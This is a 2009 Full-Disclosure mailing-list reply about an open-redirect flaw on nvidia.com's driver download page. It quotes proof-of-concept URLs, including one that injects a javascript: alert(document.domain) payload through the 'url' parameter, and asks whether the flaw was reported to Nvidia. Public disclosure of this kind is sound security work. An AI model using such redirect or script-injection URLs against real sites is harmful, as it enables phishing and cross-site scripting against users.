[Full-disclosure] nVidia.com [Url Redirection flaw]
Eitan Adler
eitanadlerlist at gmail.com
Wed Mar 25 00:26:04 GMT 2009
ascii wrote:
> Pete Licoln wrote:
>> It's just a browser based Js redirection....
>>
> http://www.nvidia.com/content/DriverDownload/download_confirmation.asp?kw=&url=http://whatismyip.com
>
> and what makes it worst than an http redirection?
>
> http://www.nvidia.com/content/DriverDownload/download_confirmation.asp?kw=&url=javascript:alert(document.domain);
>
> bye!
Has this been reported to nvidia's web/security team? The real test of
a company's security is how fast and how well they fix security
problems. Code is almost never perfect.
--
Eitan Adler
"Security is increased by designing for the way humans actually behave."
-Jakob Nielsen
Full-Disclosure is hosted and sponsored by Secunia.